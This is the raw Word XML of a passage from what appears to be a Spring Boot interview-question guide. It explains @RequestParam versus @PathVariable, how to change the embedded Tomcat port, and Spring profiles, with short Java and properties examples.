    <w:p w14:paraId="4236F46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tMapping("/api/user")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514BFDD8"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String getUser(@RequestParam("id") int userId, @RequestParam("name") String userName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B56382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User ID: " + userId + ", Name: " + userName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B55DED"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79E12FA0"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the example above, @RequestParam("id") will capture the value 123 and @RequestParam("name") will capture the value John from the query parameters in the URL (?id=123&amp;name=John).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EED07DB"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PathVariable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76534AC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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: @PathVariable is used to extract values from the URI path itself. These values are passed as part of the URL path, typically as dynamic segments of the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7468958C"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e case</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is used when you want to capture values embedded in the URI path, such as in RESTful URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3E135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 URL</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: http://localhost:8080/api/user/123/John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4779F290"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tMapping("/api/user/{id}/{name}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5B4A11"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String getUser(@PathVariable("id") int userId, @PathVariable("name") String userName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45353A27"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User ID: " + userId + ", Name: " + userName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2604CB0D"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20EE863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this example, @PathVariable("id") captures the value 123 and @PathVariable("name") captures the value John from the URL path (/user/123/John).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A0CE2A"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7"/>
        <w:gridCol w:w="4129"/>
        <w:gridCol w:w="4358"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="3CC12EBE" w14:textId="77777777" w:rsidTr="009910A9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="291212B3"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3564372B"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RequestParam</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60A533CD"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PathVariable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="24D9C48C" w14:textId="77777777" w:rsidTr="009910A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A2AFEBF"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Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E7BC96B"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tracts parameters from the query string (URL).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DEAD428"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tracts parameters directly from the URL path.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="456FE9EA" w14:textId="77777777" w:rsidTr="009910A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5155E34F"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Typical Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66FE2D3B"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ed for query parameters (e.g., ?id=123&amp;name=John).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="401A20FA"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ed for dynamic segments in the URL (e.g., /user/123/John).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="47A2F055" w14:textId="77777777" w:rsidTr="009910A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="716DA0B4"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lastRenderedPageBreak/>
              <w:t>Optional Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15BB0C6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es, parameters can be optional (with defaults).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43D7C4BA"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No, parameters are required in the URL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50EAC1C6"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Example with One URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59189B0D"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RL</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: http://localhost:8080/api/user/123/John?id=456&amp;name=Jane</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20011E90"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ing @PathVariable</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FE2FCF"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tMapping("/api/user/{id}/{name}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637D0C90"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String getUserByPath(@PathVariable("id") int userId, @PathVariable("name") String userName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F57CD8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User ID (Path): " + userId + ", Name (Path): " + userName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76746604"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A7AAD93"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ing @RequestParam</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F61BFA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tMapping("/api/user")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6401A4E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String getUserByRequestParam(@RequestParam("id") int userId, @RequestParam("name") String userName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1F55D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User ID (RequestParam): " + userId + ", Name (RequestParam): " + userName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032C9D28"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195B3AA"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the example above:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471A5A13"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athVariable extracts 123 and John from the path /api/user/123/John.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FE692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questParam extracts 456 and Jane from the query string ?id=456&amp;name=Jane.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583836E6" w14:textId="48E93CAB"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04602E0">
          <v:rect id="_x0000_i2680" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="787B07BD" w14:textId="6CEBA6BD" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="004F0738">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="645" w:name="_Toc196308125"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to change the port of the embedded tomcat server in Spring boot? Write a syntax for that</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="645"/>
    </w:p>
    <w:p w14:paraId="7FD2E8AC" w14:textId="50D64719" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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Spring Boot, you can change the default port of the embedded Tomcat server by configuring the server.port property in the application.properties or application.yml file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59351C79"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Using application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65922FE3"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o change the port in the application.properties file, add the following line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344400D1"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port=8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE0143D"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will change the default port from 8080 to 8081.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4275387C"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Using application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2604BC1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f you're using application.yml, you can configure it as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB0D6C3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012BBBDA"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ort: 8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D258D7"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Programmatically (Java Config)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A6DDE3"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also change the port programmatically by creating a SpringApplication instance and setting the port like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299B3221"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boot.SpringApplication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DEDC5A"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boot.autoconfigure.SpringBootApplication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB843A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boot.web.servlet.context.ServletWebServerApplicationContext;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41087180"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boot.web.server.WebServer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF723CC"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context.ConfigurableApplicationContext;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53254351" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57945E27"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BootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ECF54D"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MyApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8B83D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atic void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454D5BC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pringApplication app = new SpringApplication(MyApplication.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C662CB"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pp.setDefaultProperties(Collections.singletonMap("server.port", "8081"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC8D180"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ConfigurableApplicationContext context = app.run(args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F19E77B" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD2143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Optionally get the server instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095DE36A"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ebServer server = ((ServletWebServerApplicationContext) context).getWebServer();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EA08C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ystem.out.println("Server started on port: " + server.getPort());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5FF87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0ECBA10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34EC90E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code changes the port to 8081 programmatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7280038C"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lastRenderedPageBreak/>
        <w:t>4. Using Command-Line Arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341507F3"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also pass the server.port value when starting the application via the command line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DEB2F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java -jar myapplication.jar --server.port=8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B83B43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will override the default port configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A4CA8A"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ummary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFAEB0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pplication.properties</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: server.port=8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3717055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pplication.yml</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: server:\n port: 8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0933E0DA"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rogrammatically</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: app.setDefaultProperties(Collections.singletonMap("server.port", "8081"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2645B84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ommand-Line Argument</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: java -jar myapplication.jar --server.port=8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118548A8" w14:textId="03467DE4"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49A01DE">
          <v:rect id="_x0000_i2681" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC49431" w14:textId="60212387" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="004D2687">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="646" w:name="_Toc196308126"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are Profiles in Spring boot applications? Give one example</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="646"/>
    </w:p>
    <w:p w14:paraId="6785AD3B" w14:textId="121ED82E" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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 Spring Boot, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Profiles</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used to segregate application configurations for different environments (like development, testing, production, etc.). You can define multiple profiles in a Spring Boot application and specify different configurations for each environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E539EA8"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rofiles allow you to separate settings, such as database configurations, external services, logging, or security settings, depending on the environment in which the application is running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FA4DED"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How Profiles Work in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758C4E18"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efining Profiles in application.properties or application.yml:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You can define multiple properties files for different environments (profiles). For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229CD61F" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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application-dev.properties for the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>development</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CF3036" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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application-prod.properties for the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>production</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2879765D" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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application-test.properties for the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>testing</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BE933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ctivating Profiles:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Profiles can be activated in several ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682399F9" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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Via the application.properties or application.yml file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D6C73D" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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By using command-line arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A64A93" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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rogrammatically in your Spring Boot application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6087B3F4"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510F8D94"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efining Profiles in application.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB73CDB"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Default configuration (for all environments)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA69271"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port=8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4D070B"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rl=jdbc:mysql://localhost:3306/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F13EC91" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6739AA"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Dev-specific configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551BF11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profiles.active=dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFC0FDD"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reate profile-specific properties files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF96055" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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pplication-dev.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF18EEC"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Dev environment configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A04B8E4"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rl=jdbc:mysql://localhost:3306/mydb_dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2235F5C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sername=dev_user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B22529F"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password=dev_password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC85F40" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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pplication-prod.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FAEAA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Prod environment configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6008B85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rl=jdbc:mysql://prod-db-server:3306/mydb_prod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49940FB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sername=prod_user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502B7E80"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password=prod_password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA0D5FC"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ctivating Profiles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483DE416" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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In application.properties:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You can specify the active profile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0963FB09" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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profiles.active=dev  # Or 'prod', 'test', etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA22FFB" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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Via command line:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When running the application, you can pass the profile using a command-line argument:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7817945C" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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java -jar myapp.jar --spring.profiles.active=prod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA38801" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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rogrammatically in Java code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA56E80" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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Application app = new SpringApplication(MyApplication.class);</w:t>
      </w:r>
    </w:p>
